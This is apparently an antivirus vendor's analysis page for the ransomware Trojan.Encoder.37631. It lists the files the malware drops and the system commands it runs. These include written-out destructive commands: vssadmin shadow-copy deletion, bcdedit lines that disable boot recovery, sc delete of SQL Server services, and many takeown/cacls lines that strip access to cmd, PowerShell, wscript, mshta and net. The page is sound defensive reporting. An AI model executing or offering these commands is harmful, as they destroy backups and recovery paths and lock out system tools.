Trojan.Encoder.37631

Technical Information

To ensure autorun and distribution

Creates the following files on removable media

<Drive name for removable media>:\file recovery.txt
<Drive name for removable media>:\000814251_video_01.avi
<Drive name for removable media>:\join.avi
<Drive name for removable media>:\dial.bmp
<Drive name for removable media>:\coffee.bmp
<Drive name for removable media>:\dashborder_192.bmp
<Drive name for removable media>:\fi51.doc
<Drive name for removable media>:\applicantform_en.doc
<Drive name for removable media>:\issi2013_template_for_posters.docx
<Drive name for removable media>:\holycrosschurchinstructions.docx
<Drive name for removable media>:\thlps_keeper_mayer_1965.docx

Malicious functions

To complicate detection of its presence in the operating system,

deletes volume shadow copies.

Creates and executes a large number of processes from analysed file.

Injects code into

the following system processes:

%WINDIR%\microsoft.net\framework\v4.0.30319\addinprocess32.exe

Terminates or attempts to terminate

the following system processes:

%WINDIR%\microsoft.net\framework\v4.0.30319\addinprocess32.exe

Modifies file system

Creates the following files

C:\users\public\pictures\kill-delete.bat
C:\file recovery.txt
D:\file recovery.txt
D:\$recycle.bin\s-1-5-21-1960123792-2022915161-3775307078-1001\file recovery.txt
C:\$recycle.bin\s-1-5-21-1960123792-2022915161-3775307078-1001\file recovery.txt
D:\$recycle.bin\file recovery.txt
g:\file recovery.txt
C:\$recycle.bin\file recovery.txt
C:\far2\addons\colors\custom_highlighting\file recovery.txt
C:\far2\addons\colors\default_highlighting\file recovery.txt

Modifies the following files

<Drive name for removable media>:\archer.avi

Changes user data files extensions (Trojan.Encoder).

Miscellaneous

Creates and executes the following

'%WINDIR%\syswow64\cmd.exe' /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&...' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c bcdedit /set {current} bootstatuspolicy ignoreallfailures' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c bcdedit /set {current} recoveryenabled no' (with hidden window)
'<SYSTEM32>\vssadmin.exe' delete shadows /all /quiet' (with hidden window)

Executes the following

'%WINDIR%\syswow64\cmd.exe' /c ""C:\Users\Public\Pictures\Kill-Delete.bat" "
'%WINDIR%\syswow64\takeown.exe' /f <SYSTEM32>\wscript.exe /a
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\wscript.exe /g Administrators:f
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\wscript.exe /e /g Users:r
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\wscript.exe /e /g Administrators:r
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\wscript.exe /e /d SERVICE
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /d SERVICE
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /d mssql$sqlexpress
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /d system
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\wscript.exe /e /d mssql$sqlexpress
'%WINDIR%\syswow64\takeown.exe' /f %WINDIR%\SysWOW64\wscript.exe /a
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /g Administrators:f
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /g Users:r
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /g Administrators:r
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\wscript.exe /e /d mssqlserver
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\wscript.exe /e /d system
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /d system
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\wscript.exe /e /d "network service"
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\FTP.exe /e /d "network service"
'%WINDIR%\syswow64\takeown.exe' /f <SYSTEM32>\FTP.exe /a
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\FTP.exe /g Administrators:f
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\FTP.exe /e /g Users:r
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\FTP.exe /e /g Administrators:r
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\FTP.exe /e /d SERVICE
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /d SERVICE
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /d "network service"
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /d mssqlserver
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\FTP.exe /e /d mssql$sqlexpress
'%WINDIR%\syswow64\takeown.exe' /f %WINDIR%\SysWOW64\FTP.exe /a
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /g Administrators:f
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /g Users:r
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /g Administrators:r
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\FTP.exe /e /d mssqlserver
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\FTP.exe /e /d system
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /d mssql$sqlexpress
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /d mssqlserver
'%WINDIR%\syswow64\takeown.exe' /f <SYSTEM32>\cscript.exe /a
'%WINDIR%\syswow64\takeown.exe' /f <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /a
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
'%WINDIR%\microsoft.net\framework\v4.0.30319\addinprocess32.exe'
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /d system
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /d mssql$sqlexpress
'%WINDIR%\syswow64\cmd.exe' /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&...
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
'%WINDIR%\syswow64\sc.exe' delete "MSSQLFDLauncher"
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /d system
'%WINDIR%\syswow64\cmd.exe' /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
'%WINDIR%\syswow64\cmd.exe' /c bcdedit /set {current} recoveryenabled no
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /d system
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /d "network service"
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /d SERVICE
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\cscript.exe /g Administrators:f
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\cscript.exe /e /g Users:r
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\cscript.exe /e /g Administrators:r
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\cscript.exe /e /d SERVICE
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /d mssqlserver
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /d mssql$sqlexpress
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /d "network service"
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\cscript.exe /e /d mssqlserver
'%WINDIR%\syswow64\takeown.exe' /f %WINDIR%\SysWOW64\cscript.exe /a
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /g Administrators:f
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /g Users:r
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /g Administrators:r
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\cscript.exe /e /d "network service"
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\cscript.exe /e /d system
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\cscript.exe /e /d mssql$sqlexpress
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /d "network service"
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /d mssqlserver
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /d SERVICE
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /d mssql$sqlexpress
'%WINDIR%\syswow64\takeown.exe' /f <SYSTEM32>\net.exe /a
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\net.exe /g Administrators:f
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\net.exe /e /g Users:r
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\net.exe /e /g Administrators:r
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /d "network service"
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /g Administrators:r
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /d mssqlserver
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\net.exe /e /d system
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\net.exe /e /d mssql$sqlexpress
'%WINDIR%\syswow64\takeown.exe' /f %WINDIR%\SysWOW64\net.exe /a
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\net.exe /g Administrators:f
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /g Users:r
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\net.exe /e /d mssqlserver
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\net.exe /e /d SERVICE
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\net.exe /e /d "network service"
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /g Administrators:r
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\cmd.exe /e /d "network service"
'%WINDIR%\syswow64\takeown.exe' /f <SYSTEM32>\cmd.exe /a
'%WINDIR%\syswow64\cmd.exe' /S /D /c" echo y"
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\cmd.exe /g Administrators:f
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\cmd.exe /e /g Users:r
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\cmd.exe /e /g Administrators:r
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /d SERVICE
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /d SERVICE
'%WINDIR%\syswow64\reg.exe' delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\cmd.exe /e /g system:r
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\cmd.exe /e /d mssql$sqlexpress
'%WINDIR%\syswow64\takeown.exe' /f %WINDIR%\SysWOW64\cmd.exe /a
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /g Administrators:f
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /g Users:r
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\cmd.exe /e /d mssqlserver
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\cmd.exe /e /d SERVICE
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /g system:r
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /d mssqlserver
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /d mssql$sqlexpress
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\mshta.exe /g Administrators:f
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\mshta.exe /e /g Users:r
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\mshta.exe /e /g Administrators:r
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\mshta.exe /e /d SERVICE
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /d system
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /d mssqlserver
'%WINDIR%\syswow64\takeown.exe' /f <SYSTEM32>\mshta.exe /a
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\mshta.exe /e /d mssqlserver
'%WINDIR%\syswow64\takeown.exe' /f %WINDIR%\SysWOW64\mshta.exe /a
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /g Administrators:f
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /g Users:r
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /g Administrators:r
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\mshta.exe /e /d "network service"
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\mshta.exe /e /d system
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\mshta.exe /e /d mssql$sqlexpress
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /d "network service"
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /d SERVICE
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /d "network service"
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /d mssql$sqlexpress
'%WINDIR%\syswow64\takeown.exe' /f <SYSTEM32>\net1.exe /a
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\net1.exe /g Administrators:f
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\net1.exe /e /g Users:r
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\net1.exe /e /g Administrators:r
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\net1.exe /e /d SERVICE
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /d system
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\net1.exe /e /d mssqlserver
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\net1.exe /e /d system
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\net1.exe /e /d mssql$sqlexpress
'%WINDIR%\syswow64\takeown.exe' /f %WINDIR%\SysWOW64\net1.exe /a
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\net1.exe /g Administrators:f
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /g Users:r
'%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /g Administrators:r
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\net1.exe /e /d "network service"
'%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
'%WINDIR%\syswow64\takeown.exe' /f %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a

Technologies

Terminology

Training and education

Myths

Technical Information

Curing recommendations

Free trial